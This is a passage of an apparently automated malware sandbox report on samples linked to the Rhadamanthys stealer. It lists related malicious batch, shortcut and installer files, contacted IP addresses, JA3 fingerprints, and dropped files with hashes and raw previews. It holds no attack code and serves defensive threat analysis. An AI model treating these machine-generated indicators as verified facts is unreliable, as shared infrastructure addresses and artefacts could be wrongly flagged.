                                                                                                                                                                                                                                                                                                  ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  DROPBOXUSRichiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  Updates.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  ljshdfglksdfNEW.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.18
                                                                                                                                                                                                                                                                                                  kjhsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjsdhfgs.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  7p5nITtglJ.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  kjshdkfgjsdg.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.69.18

                                                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0etaCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  Richiesta di Indagine sulla Violazione del Copyright lnk.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  9coWg6ayLz.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  UFS0yWUTWR.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  xrv3PCeWDV.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  K2B1CPXWSc.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  HwFciuum6M.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  qKIpxnvEyJ.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  3PALEJZmqL.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15
                                                                                                                                                                                                                                                                                                  8GPpalEkUp.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                  • 162.125.65.15
                                                                                                                                                                                                                                                                                                  • 162.125.69.18
                                                                                                                                                                                                                                                                                                  • 18.192.31.165
                                                                                                                                                                                                                                                                                                  • 162.125.69.15

                                                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\1061714629.exetaCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                                    C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exetaCCGTk8n1.lnkGet hashmaliciousRHADAMANTHYSBrowse

                                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.729047413248192
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqY:2JIB/wUKUKQncEmYRTwh0F
                                                                                                                                                                                                                                                                                                      MD5:7EB1EC94DED4FDB4B358B6A2419CB85F
                                                                                                                                                                                                                                                                                                      SHA1:410A8953720DD0DE1647B04E493D8E012A853C63
                                                                                                                                                                                                                                                                                                      SHA-256:4ABFFF09BB482B4D89EBDFA2B98F532EEC8DFD0CB968BF441CCC0BA47F8D4152
                                                                                                                                                                                                                                                                                                      SHA-512:C63F6514DE7F608DB54B767ECA1AEB277AE2099D6C22DFE2E6908168BF2969B2989B0BF9CF97828429BD4D98623E1A111C546BBF58DB9526C1B42E1E9C7A1AD0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7a46f6e2, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1310720
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.7900214533029243
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
                                                                                                                                                                                                                                                                                                      MD5:C6B585C743BF6E9B5DA77C8F48A2CBF7
                                                                                                                                                                                                                                                                                                      SHA1:30D32C207AA7757DCE278E4D70D52BAAC5F5EEAE
                                                                                                                                                                                                                                                                                                      SHA-256:B32002653D27035780BDAC0891C7A0BD30C0800B315D0711A5FFB006BBBC1437
                                                                                                                                                                                                                                                                                                      SHA-512:C6CC8DD2DD28F05719E78D775C6D2E3FF3927CBDC5F86716C0042603EAAE6EE31BB2E386AFE91A008022A6847665E5CA6844E254F790448554B81FF3301BB441
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:zF..... ...............X\...;...{......................0.`.....42...{5..)...|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................k...)...|....................X`.)...|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):16384
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08221887823611387
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:fTlEYeP1vp0xiAt/57Dek3JY9FI0/tallEqW3l/TjzzQ/t:fpEzP1vp4iAR3tYnIOImd8/
                                                                                                                                                                                                                                                                                                      MD5:E3A75DBD98D8A1D9E1E340B57967FD64
                                                                                                                                                                                                                                                                                                      SHA1:1AC97D890613489057115B024C7E142A3FC8F915
                                                                                                                                                                                                                                                                                                      SHA-256:B9D501B1585456015613C2D09A501FEF689517C99B048CDACA9F3421BE98A66E
                                                                                                                                                                                                                                                                                                      SHA-512:D72DD60C5D47D61C63DF99938563250472276157D910C783CC2144420A894264EDEA04108DCFE5CF6C3FEB47E2C6E206B8F35A464221482C6512393AEA187650
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..g......................................;...{...)...|..42...{5.........42...{5.42...{5...Y.42...{59..................X`.)...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_fontdrvhost.exe_d32c824e8915b30da4efd4eabd13e74e4ef8c1_ad0be647_043ebb8b-f4df-4822-a311-c8c3b9345dbc\Report.wer

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.660277981591366
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:DeFgH3eXqigKJFs3Wrk41yHpHS2QXIDcQkc6tcEycw3ZUtzJzQ+HbHgrZ2ZAX/d7:qggHnFxR0apYKjqzuiFyZ24lO8JO
                                                                                                                                                                                                                                                                                                      MD5:10F280F9F2C9B2E95BCC7BC6A27D8A2A
                                                                                                                                                                                                                                                                                                      SHA1:A0DE10A94FE2AC84C5B64387D9FD88BB9F04F652
                                                                                                                                                                                                                                                                                                      SHA-256:413C052F0B9CA2C3EACE53EF72B7F278455B979AE8B5473454F7EFA0AB4CA914
                                                                                                                                                                                                                                                                                                      SHA-512:FC9C6F9C275C9EE0E329CEDC4F05502015BE0D46AB50B6CAEE654BCB20C8E7A2970F4625D27CDE89292F29673E8B0EB7412F03F2AC4525AA6A210498CA189071
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.6.4.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.3.3.1.3.1.7.2.3.7.8.5.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.3.3.1.3.1.8.3.9.5.2.0.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.3.e.b.b.8.b.-.f.4.d.f.-.4.8.2.2.-.a.3.1.1.-.c.8.c.3.b.9.3.4.5.d.b.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.e.9.0.f.7.1.0.-.1.e.7.e.-.4.0.0.c.-.a.1.3.1.-.7.0.5.2.1.c.7.d.d.3.6.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.f.o.n.t.d.r.v.h.o.s.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.2.6.e.0.-.0.0.0.1.-.0.0.1.4.-.e.6.5.6.-.5.2.e.8.3.6.4.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.5.e.f.b.3.f.9.7.3.4.2.b.a.1.9.5.4.2.4.1.3.4.f.2.8.f.9.7.7.d.a.9.e.0.d.6.a.a.9.1.!.f.o.n.t.d.r.v.h.o.

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER13A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):8622
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.6927412410390708
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJ94Ob3U6YB5DV4XhQgmfr57vopDp89bow2VfwYm:R6lXJiZ6YBtV4xQgmfrFvDo/VfG
                                                                                                                                                                                                                                                                                                      MD5:1DE07EF72C875C46B2CD26ABE702A849
                                                                                                                                                                                                                                                                                                      SHA1:F398EA9606B70DE01273D70834C2DFD7FC3760CF
                                                                                                                                                                                                                                                                                                      SHA-256:DA6A44C1D24209216082E96D21241A52FECB0AC9876B6C697E86D31F3DDB6B48
                                                                                                                                                                                                                                                                                                      SHA-512:D1121280C526C7FCC9AC0E453030A69CA561FF1430C35CB161CA45F81B7D6593BF62A065AF8933F69B9B987D71AC87A718BDFA8A517727EAB4A3ADE23790CE1A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.9.9.5.2.<./.P.i.

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER300.tmp.xml

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):4853
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.443087561445643
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsAtJg771I9z4WpW8VYwYm8M4Jk5LvM6FLoyq8vU5LvMoKnaMuRFd:uIjfGI7Ex7V4JcjMTWsjMoKn1u7d
                                                                                                                                                                                                                                                                                                      MD5:35ED30C4341C2845F54158D36EC8CD40
                                                                                                                                                                                                                                                                                                      SHA1:56192AD6B3241BEE2A452FE3D09F45E618BBFC14
                                                                                                                                                                                                                                                                                                      SHA-256:144B332B93F5F344E945EF207078B30C5857631F2BFD197ACD508B41ED3F14FF
                                                                                                                                                                                                                                                                                                      SHA-512:8F2730D56B473724192E9CCEF9F6391C5461EAFF05D1DF13C9FE6D1870E9B1BD16EA33870F52555DDD212255A5CC46BEFD8FBC695BAE169FEBA6E695FB7A88DA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="625571" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F.tmp.dmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 14 streams, Tue Dec 10 19:08:37 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):47430
                                                                                                                                                                                                                                                                                                      Entropy (8bit):1.2844188585121865
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:96:5A8DQ4mR77SybNDSQnE7i7oqbq7qs+h7x3+H/JrU9zAC7k+WI5rIgoARaZLW:9M4gRqO/uOs+hB+HxuAik+oAYk
                                                                                                                                                                                                                                                                                                      MD5:E4E1978D07F545B0441F264E690F9710
                                                                                                                                                                                                                                                                                                      SHA1:637345C7B811E2033A69589412A0A46B1A89F231
                                                                                                                                                                                                                                                                                                      SHA-256:C759E456B41ECC63C4EDC710EE41601A867F034B22FE59B40D1A8344B6EDE291
                                                                                                                                                                                                                                                                                                      SHA-512:7CD9AA77CF71B6F96CA2EB5C501890BD995B799BACA058FDB2CAF18718CBD772CAA7143E23BE09D36D1379F8542D9F9B3F4F1859136B3E9F6A723BFB9D447B34
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:MDMP..a..... .........Xg........................................2!..........T.......8...........T.......................................................................................................................eJ..............Lw......................T........&....Xg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\2031830f-48a8-46d8-b50d-cae84902ccec.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                                      Size (bytes):46101
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.08807620591784
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5Mnq/1KKGf4F4MiYUwQ1d1gHfhxPFDWBOCpsq9Cioc7DRo+yM/45:5Mk1rT8HEnzYURduSOCaGFoc7VLyMV/s
                                                                                                                                                                                                                                                                                                      MD5:9028B67CBD38DBCEE3873FF83E0ED8BE
                                                                                                                                                                                                                                                                                                      SHA1:967822AE218CB5DB170545B23BFCFCD261572597
                                                                                                                                                                                                                                                                                                      SHA-256:BED2891EB9499573FD700E70C664CA5D01403247F3F3DDAF80685BD7615C4335
                                                                                                                                                                                                                                                                                                      SHA-512:93C18E67A17375430C0240C72B54B211A7AD958CECAC9EFEE42DD3B8892A02F26C4A945F1D2318F8C4C6D76E167E98E3C0DB89D225554C1CF1AC23DECBD9D73D
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\25d57c87-d1d8-4a51-b651-d7cfecf27941.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44818
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.097121620115022
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5dajNKKGf4F4MiYUwQ1d1g0195oghfSCJuNPOCpsqh7DRo+yM/4E:5Mk1rT8H1aCYURdu01mOCaI7VLyMV/Ya
                                                                                                                                                                                                                                                                                                      MD5:DF323B9984920EC63CD08F15CF33DA15
                                                                                                                                                                                                                                                                                                      SHA1:6B8CFEB9F56CAB12E06F79A606CA8CF1A1E674D4
                                                                                                                                                                                                                                                                                                      SHA-256:6A98937AD14C4D558E357D418535D2148E56C809366AB76D023B0BF897FF5778
                                                                                                                                                                                                                                                                                                      SHA-512:87D162C6FFB63B3721095294187963EFE21485597F95C4876155759A2EE08045CD36A490557A5493048ED4D93BA8840E49C3052870C94E3FCD11C614FC6A1350
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733852496"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNor

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\4210ff19-c45e-4ab8-b962-75fa4d5e9c6e.tmp

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):46024
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.088127855412453
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:5MkbJrT8IeQc5dajNKKGf4F4MiYUwQ1d1gcfhxPFDWBOCpsq9Cioc7DRo+yM/42E:5Mk1rT8H1aCYURduJOCaGFoc7VLyMV/s
